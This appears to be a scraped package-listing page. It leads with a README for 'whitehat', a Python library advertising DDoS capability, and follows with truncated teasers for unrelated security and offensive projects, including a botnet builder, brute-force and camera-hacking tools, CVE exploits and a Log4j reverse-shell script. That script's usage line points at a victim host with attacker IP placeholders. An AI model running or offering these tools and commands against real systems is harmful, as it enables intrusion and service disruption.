Whitehat
Features
- DDoS (Can up to 1500+ Requests per seconds)
- Get Phonenumber Info
- More features soon!
Install
pip install whitehat
pip install whitehat
pybotnet A Python Library for building botnet , trojan or backdoor for windows and linux with Telegram control panel Disclaimer: Please note that this
This tool gives developers, researchers and companies the ability to analyze software packages of different programming languages that are being or will be used in their codes, providing information that allows them to know in advance if this library complies with processes. secure development, if currently supported, possible backdoors (malicious embedded code), typosquatting analysis, the history of versions and reported vulnerabilities (CVEs) of the package.
Vacuna Inject everything! Vacuna is a little library to provide dependency management for your python code. Install pip install vacuna Usage import va
What is Buff? A simple BOF library I wrote under an hour to help me automate with BOF attack. It comes with fuzzer and a generic method to generate ex
This preserves the early code of a Python decompiler for Python versions 1.5 to 2.4. I have been able to install this using pyenv using Python 2.3.7 u
Python Code Obfuscator A script that converts code into full on random numerical expressions. Simple Scripts: Python Mode... Input: Function that deco
Python Code Obfuscator A script that converts code into full on random numerical expressions. Simple Scripts: Python Mode... Input: Function that deco
Whois-Python-GUI Get Whois Domain with Python - GUI :) WARNING Dont Copy ! - W
A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including Python 3.10.*)
Your FOSSA integration was successful! Attached in this PR is a badge and license report to track scan status in your README.
Below are docs for integrating FOSSA license checks into your CI:
Updating the whole cryptography function + added more features, such as Binary and Morse
cryptography function, such as Binary and MorseLike always bruh
enhancement Readme files sus mergedExample: from class().location() you can do: class().location
Make it more professional, most developers like to be able to put what functions return to their advantage, using print isnt professional and useless.
Very important if you want to make a library.
mergedRemoving useless variable make your lib looks readable and not confusing, also make it more professional.
Updates :
Changelogs and Updates can be seen in the gist changelogs.
pip install whitehat==1.2
v1.2 Features :
Features :
Version 2.0 will be scheduled to be released after the new year 2022 or the end of December. Join our Discord server for more information
Source code(tar.gz)CVE-2021-41773 PoC Proof of concept to check if hosts are vulnerable to CVE-2021-41773. Description (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CV
Dlint Dlint is a tool for encouraging best coding practices and helping ensure Python code is secure. The most important thing I have done as a progra
Insta-crack This is a instagram brute force tool that uses tor as its proxy connections, keep in mind that you should not do anything illegal with thi
Cam-Hacker Hack Cameras Mode Of Execution: apt-get install python3 apt-get insta
subDomainsBrute 1.4 A fast sub domain brute tool for pentesters. It works with P
Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At
CloakifyFactory CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight; Evade DLP/MLS Devices; Social Engineering of
bootleg-productions consider this account to be a journal for me to record my progress throughout my python journey feel free to copy codes from this
Exch-CVE-2021-26855 ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker b
obscurepy Description A tool for obscuring, or making python source code difficult to read. Table of Contents Installation Limitations Usage Disclaime
WELCOME TO LAYLA Layla is a python script that automatically performs recon on a
OracleOTM Python tool for exploiting CVE-2021-35616 The script works in modules, which I implemented in the following order: ► Username enumeration ►
Attraction Finder Developers: Riyon Praveen, Aaron Bijoy, & Yash Vora How It Wor
HexCopy IDA plugin for quickly copying disassembly as encoded hex bytes. This whole plugin just saves you two extra clicks... but if you are frequentl
Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3, It Fuzzes All URLs of target website & then scan them for EAR
NFT Collectibles using Blender Python What is this? This project is to demonstrate for generating NFT Collectible Avatar-Styled images. For details, p
Fuzzercorn libfuzzer bindings for Unicorn. API // The main entry point of the fu
HashDB IDA Plugin Malware string hash lookup plugin for IDA Pro. This plugin connects to the OALABS HashDB Lookup Service. Adding New Hash Algorithms
CVE-2021-24086 This is a proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability "), a NULL dereference in tcpip.sys patc
DomainMonitor is a web project that has a RESTful API to get a domain's subdomains and whois data.